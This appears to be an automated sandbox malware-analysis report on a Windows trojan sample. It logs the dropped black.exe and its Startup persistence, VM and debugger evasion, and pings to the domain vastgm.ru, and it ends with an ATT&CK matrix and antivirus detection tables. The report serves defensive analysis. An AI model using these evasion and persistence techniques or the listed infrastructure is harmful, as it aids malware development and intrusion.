Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: CD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 4520000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 6A70000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 6CB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: 8CB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 4670000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 4C90000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 6C90000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 6ED0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeWindow / User API: threadDelayed 2118Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeWindow / User API: threadDelayed 1185Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeWindow / User API: threadDelayed 2024Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeWindow / User API: threadDelayed 1110Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 375
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-25992
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2596Thread sleep count: 59 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2596Thread sleep time: -59000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 3164Thread sleep count: 2118 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2696Thread sleep count: 276 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6364Thread sleep count: 42 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6364Thread sleep time: -42000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 348Thread sleep count: 109 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900Thread sleep count: 124 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900Thread sleep time: -124000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6988Thread sleep count: 1185 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 4944Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 792Thread sleep count: 45 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 792Thread sleep time: -45000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5896Thread sleep count: 2024 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5420Thread sleep count: 71 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5420Thread sleep time: -71000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 2060Thread sleep count: 84 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5892Thread sleep count: 1110 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924Thread sleep count: 141 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924Thread sleep time: -141000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5876Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9D40BC
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9FFCA0 FindFirstFileExA,0_2_00007FF6CA9FFCA0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F16A4 VirtualQuery,GetSystemInfo,0_2_00007FF6CA9F16A4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeThread delayed: delay time: 120000Jump to behavior
Source: Y5kEUsYDFr.exe, 00000000.00000002.4145231704.0000017ACB886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxService
Source: black.exe, 00000001.00000002.4145831872.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, black.exe, 00000007.00000002.4145663567.00000000008E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSystem information queried: KernelDebuggerInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F3170
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA00D20 GetProcessHeap,0_2_00007FF6CAA00D20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F3354 SetUnhandledExceptionFilter,0_2_00007FF6CA9F3354
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6CA9F2510
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F3170
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F76D8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ruJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9E9D90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,CopySid,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_00007FF6CA9E9D90
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9DDC70 cpuid 0_2_00007FF6CA9DDC70
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6CA9EA2CC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeQueries volume information: C:\Users\user\AppData\Roaming\black.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9F0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D4EB0 GetVersionExW,0_2_00007FF6CA9D4EB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		3
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job121
Registry Run Keys / Startup Folder		1
DLL Side-Loading		3
Obfuscated Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Process Injection		2
Software Packing		Security Account Manager35
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook121
Registry Run Keys / Startup Folder		1
Timestomp		NTDS1
Query Registry		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets341
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading		DCSync251
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
Virtualization/Sandbox Evasion		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadow1
Remote System Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571211 Sample: Y5kEUsYDFr.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 61 vastgm.ru 2->61 63 x1.i.lencr.org 2->63 65 github.com 2->65 71 Antivirus detection for dropped file 2->71 73 Multi AV Scanner detection for dropped file 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 4 other signatures 2->77 9 Y5kEUsYDFr.exe 11 2->9         started        12 black.exe 3 2->12         started        15 Acrobat.exe 2->15         started        signatures3 process4 file5 57 C:\Users\user\AppData\Local\...\black.exe, PE32 9->57 dropped 17 black.exe 16 7 9->17         started        87 Multi AV Scanner detection for dropped file 12->87 89 Query firmware table information (likely to detect VMs) 12->89 91 Hides threads from debuggers 12->91 22 cmd.exe 12->22         started        24 cmd.exe 12->24         started        26 AcroCEF.exe 15->26         started        signatures6 process7 dnsIp8 59 github.com 20.233.83.145, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->59 53 C:\Users\user\AppData\Roaming\black.exe, PE32 17->53 dropped 55 C:\Users\user\AppData\Roaming\...\black.exe, PE32 17->55 dropped 79 Antivirus detection for dropped file 17->79 81 Multi AV Scanner detection for dropped file 17->81 83 Query firmware table information (likely to detect VMs) 17->83 85 4 other signatures 17->85 28 cmd.exe 1 17->28         started        31 cmd.exe 17->31         started        33 conhost.exe 22->33         started        35 PING.EXE 22->35         started        37 conhost.exe 24->37         started        39 PING.EXE 24->39         started        41 AcroCEF.exe 26->41         started        file9 signatures10 process11 dnsIp12 93 Uses ping.exe to check the status of other devices and networks 28->93 44 PING.EXE 1 28->44         started        47 conhost.exe 28->47         started        49 conhost.exe 31->49         started        51 PING.EXE 31->51         started        67 69.192.108.223, 443, 49785 AKAMAI-ASUS United States 41->67 signatures13 process14 dnsIp15 69 vastgm.ru 185.178.208.190 DDOS-GUARDRU Russian Federation 44->69

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Y5kEUsYDFr.exe47%ReversingLabsWin32.Exploit.Generic
Y5kEUsYDFr.exe61%VirustotalBrowse
Y5kEUsYDFr.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe100%AviraHEUR/AGEN.1310014
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe100%AviraHEUR/AGEN.1310014
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe100%AviraHEUR/AGEN.1310014
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\black.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
vastgm.ru0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
20.233.83.145
truefalse
    		high
    vastgm.ru
